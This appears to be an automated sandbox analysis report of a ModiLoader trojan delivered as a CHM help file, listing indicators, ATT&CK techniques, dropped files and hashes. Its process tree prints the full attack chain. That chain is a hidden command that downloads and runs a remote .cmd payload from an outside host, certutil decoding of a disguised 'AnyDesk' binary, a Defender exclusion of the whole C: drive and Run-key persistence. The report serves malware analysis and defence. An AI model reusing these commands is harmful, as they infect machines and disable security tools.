modiloader | 2756869dcb28558efa87f421ed3bcbfe371028ef8dce5a33513fdc299a6aec08

Resubmissions

15-01-2025 16:20

250115-ttetnazjfk 3

15-01-2025 15:00

250115-sdde8awlfy 10

Analysis

max time kernel
103s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-01-2025 15:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AVSL-004673321/AVSL-004673321.chm
Size

75KB
MD5

98ea3f95d115f45570febc7a1872b1a7
SHA1

a0985ee5bba1ed9ea30a4422c4007d35efde92d2
SHA256

94492a4bfc8998c413bd30023b60427b394e5950eed33373f07faaf863c1d3f3
SHA512

cbd8258068e3d25a682d9402a68adf5b9f8fba7414545b86af1e801c705dca4c77b5df77696b867cddf20f803f4cb599f472d3e76202df2dd1e75471b15afd86
SSDEEP

1536:4pVD2VwAO+rou4327/9AbCtkFLStN1osGQPGYQ+yV:uVgbO+rv79kCOUbKnQDQ+C

Score

10^/10

modiloader defense_evasion discovery execution persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/3892-68-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-73-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-75-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-79-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-87-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-86-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-85-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-99-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-97-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-107-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-133-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-131-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-130-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-129-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-128-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-127-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-126-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-125-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-124-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-123-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-122-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-120-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-119-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-118-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-117-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-116-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-115-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-114-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-113-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-111-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-110-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-109-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-108-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-106-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-105-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-104-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-102-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-101-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-100-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-98-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-132-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-96-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-95-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-94-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-121-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-93-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-92-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-91-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-90-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-112-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-88-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-83-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-82-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-81-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-80-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-89-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-78-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-84-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-77-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-76-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2
behavioral2/memory/3892-74-0x0000000002A00000-0x0000000003A00000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3224	powershell.exe
400	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	awpha.pif

Executes dropped EXE 10 IoCs

pid	Process
4672	ript.exe
1912	alpha.pif
4608	phf.pif
1408	alpha.pif
2748	phf.pif
4864	awpha.pif
3892	AnyDesk.pif
4100	svchost.pif
2464	xkn.pif
3956	qcdrcmnB.pif

Loads dropped DLL 1 IoCs

pid	Process
4100	svchost.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bnmcrdcq = "C:\\Users\\Public\\Bnmcrdcq.url"	AnyDesk.pif

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
1140	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3892 set thread context of 3956	3892	AnyDesk.pif	133

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qcdrcmnB.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
880	PING.EXE
3932	PING.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
1516	taskkill.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
880	PING.EXE
3932	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3224	powershell.exe
3224	powershell.exe
400	powershell.exe
400	powershell.exe
2464	xkn.pif
2464	xkn.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif
3956	qcdrcmnB.pif

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	2464	xkn.pif

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3668	hh.exe
3668	hh.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3668 wrote to memory of 1140	3668	hh.exe	83
PID 3668 wrote to memory of 1140	3668	hh.exe	83
PID 1140 wrote to memory of 4476	1140	cmd.exe	85
PID 1140 wrote to memory of 4476	1140	cmd.exe	85
PID 1140 wrote to memory of 3224	1140	cmd.exe	86
PID 1140 wrote to memory of 3224	1140	cmd.exe	86
PID 3224 wrote to memory of 4672	3224	powershell.exe	87
PID 3224 wrote to memory of 4672	3224	powershell.exe	87
PID 1140 wrote to memory of 400	1140	cmd.exe	89
PID 1140 wrote to memory of 400	1140	cmd.exe	89
PID 400 wrote to memory of 2772	400	powershell.exe	90
PID 400 wrote to memory of 2772	400	powershell.exe	90
PID 1140 wrote to memory of 1516	1140	cmd.exe	92
PID 1140 wrote to memory of 1516	1140	cmd.exe	92
PID 2772 wrote to memory of 824	2772	cmd.exe	95
PID 2772 wrote to memory of 824	2772	cmd.exe	95
PID 2772 wrote to memory of 4744	2772	cmd.exe	96
PID 2772 wrote to memory of 4744	2772	cmd.exe	96
PID 2772 wrote to memory of 4432	2772	cmd.exe	97
PID 2772 wrote to memory of 4432	2772	cmd.exe	97
PID 2772 wrote to memory of 1912	2772	cmd.exe	98
PID 2772 wrote to memory of 1912	2772	cmd.exe	98
PID 1912 wrote to memory of 4608	1912	alpha.pif	99
PID 1912 wrote to memory of 4608	1912	alpha.pif	99
PID 2772 wrote to memory of 1408	2772	cmd.exe	100
PID 2772 wrote to memory of 1408	2772	cmd.exe	100
PID 1408 wrote to memory of 2748	1408	alpha.pif	101
PID 1408 wrote to memory of 2748	1408	alpha.pif	101
PID 2772 wrote to memory of 4864	2772	cmd.exe	102
PID 2772 wrote to memory of 4864	2772	cmd.exe	102
PID 2772 wrote to memory of 880	2772	cmd.exe	105
PID 2772 wrote to memory of 880	2772	cmd.exe	105
PID 4864 wrote to memory of 3892	4864	awpha.pif	106
PID 4864 wrote to memory of 3892	4864	awpha.pif	106
PID 4864 wrote to memory of 3892	4864	awpha.pif	106
PID 3892 wrote to memory of 3776	3892	AnyDesk.pif	121
PID 3892 wrote to memory of 3776	3892	AnyDesk.pif	121
PID 3892 wrote to memory of 3776	3892	AnyDesk.pif	121
PID 3892 wrote to memory of 1720	3892	AnyDesk.pif	123
PID 3892 wrote to memory of 1720	3892	AnyDesk.pif	123
PID 3892 wrote to memory of 1720	3892	AnyDesk.pif	123
PID 1720 wrote to memory of 4100	1720	cmd.exe	125
PID 1720 wrote to memory of 4100	1720	cmd.exe	125
PID 4100 wrote to memory of 2788	4100	svchost.pif	126
PID 4100 wrote to memory of 2788	4100	svchost.pif	126
PID 2788 wrote to memory of 2496	2788	cmd.exe	128
PID 2788 wrote to memory of 2496	2788	cmd.exe	128
PID 2788 wrote to memory of 2464	2788	cmd.exe	129
PID 2788 wrote to memory of 2464	2788	cmd.exe	129
PID 2788 wrote to memory of 3932	2788	cmd.exe	131
PID 2788 wrote to memory of 3932	2788	cmd.exe	131
PID 3892 wrote to memory of 3956	3892	AnyDesk.pif	133
PID 3892 wrote to memory of 3956	3892	AnyDesk.pif	133
PID 3892 wrote to memory of 3956	3892	AnyDesk.pif	133
PID 3892 wrote to memory of 3956	3892	AnyDesk.pif	133
PID 3892 wrote to memory of 3956	3892	AnyDesk.pif	133

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\AVSL-004673321\AVSL-004673321.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3224
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:4672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Windows\system32\extrac32.exe
        
        extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
        5⤵
        
        PID:824
    - - C:\Windows\system32\extrac32.exe
        
        extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
        5⤵
        
        PID:4744
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
        5⤵
        
        PID:4432
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1912
      - C:\Users\Public\phf.pif
        
        C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
        6⤵
        Executes dropped EXE
        
        PID:4608
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1408
      - C:\Users\Public\phf.pif
        
        C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
        6⤵
        Executes dropped EXE
        
        PID:2748
    - - C:\Users\Public\awpha.pif
        
        "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4864
      - C:\Users\Public\Libraries\AnyDesk.pif
        
        "C:\Users\Public\Libraries\AnyDesk.pif"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\BnmcrdcqF.cmd" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1720
        
        C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2788
        
        C:\Windows\system32\extrac32.exe
        
        extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.pif"
        10⤵
        
        PID:2496
        
        C:\Users\Public\xkn.pif
        
        C:\\Users\\Public\\xkn.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2464
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 10
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3932
        
        C:\Users\Public\Libraries\qcdrcmnB.pif
        
        C:\Users\Public\Libraries\qcdrcmnB.pif
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3956
    - - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 5
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:880
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kdt3chrh.biq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\AnyDesk.avi

Filesize
1.6MB

MD5
4b6b8688bffe5b3ce33d16f6fb02e0ec

SHA1
f287b2320d312ee1ec4ad30d251f837860b23699

SHA256
b8d9fedf4ee1a38007dbd30c7035e0051221689bcf24f1b309a20aea9a0022df

SHA512
9aedba5b7dadde70dc5bcd2063d9e6ccbf26f2137890c7ed2214b875bd000df85a54622fcaff1189d4fec04e3a9a705182ff79aa919e88f0193b0b3724b9aafe

Download Submit
C:\Users\Public\BnmcrdcqF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\Libraries\AnyDesk.pif

Filesize
834KB

MD5
acd0b6c4c786c7b71de56604c8bf514b

SHA1
991fd02aabe3f37bec962d1b245839d0b06ad4f6

SHA256
91864c398cca62213144a0ecd8b58c1fb46640d0a78d358775312e527d9fc1f5

SHA512
ec6814f187f84f08cb8d81f43878471aff395c9086790af4c314e2f6c434ebc4770af10b90a40ecf5d14809c99663adc2e9806ad0d16b3b553ba3cef9c5c99b9

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
27KB

MD5
e24fa8fb365a89779b026772b9342af3

SHA1
b90de3c9f3093ca8badfaf6c98218b744087e8f9

SHA256
10d7b4ea056fc1037109fe6e6694849d145b0745faa9ae02957104a2834a14a0

SHA512
a32f7a29c4c8cc831a5057b8db31f79e7dedb9172ac9705da6a8da65384ed23827c3cccdb833562cdab63addd679341707a2b46bbc8c802845cbbbbb01771d10

Download Submit
C:\Users\Public\Libraries\qcdrcmnB.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\alpha.pif

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\awpha.pif

Filesize
66KB

MD5
ef9bba7a637a11b224a90bf90a8943ac

SHA1
4747ec6efd2d41e049159249c2d888189bb33d1d

SHA256
2fda95aafb2e9284c730bf912b93f60a75b151941adc14445ed1e056140325b1

SHA512
4c1fdb8e4bf25546a2a33c95268593746f5ae2666ce36c6d9ba5833357f13720c4722231224e82308af8c156485a2c86ffd97e3093717a28d1300d3787ef1831

Download Submit
C:\Users\Public\df.cmd

Filesize
2.3MB

MD5
800b673badb63ad57e96324389a9f77b

SHA1
e72da9e4dbe7f584a449d434e63ad71a2d4b74d0

SHA256
60412b1b9b974a1309f7209def199a77e6d087f67d58018f26d035505f5cc7a6

SHA512
0a4c0fc2cf809f5a520d9484b519b960fedbfe379129a454db91b73dc97a30bb8f581644e7c3187a46e4333bf3c7d02db3baea8903fa66b8089da582233b5618

Download Submit
C:\Users\Public\phf.pif

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\ript.exe

Filesize
157KB

MD5
24590bf74bbbbfd7d7ac070f4e3c44fd

SHA1
cdfe517d07f18623778829aa98d6bbadd3f294cd

SHA256
ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03

SHA512
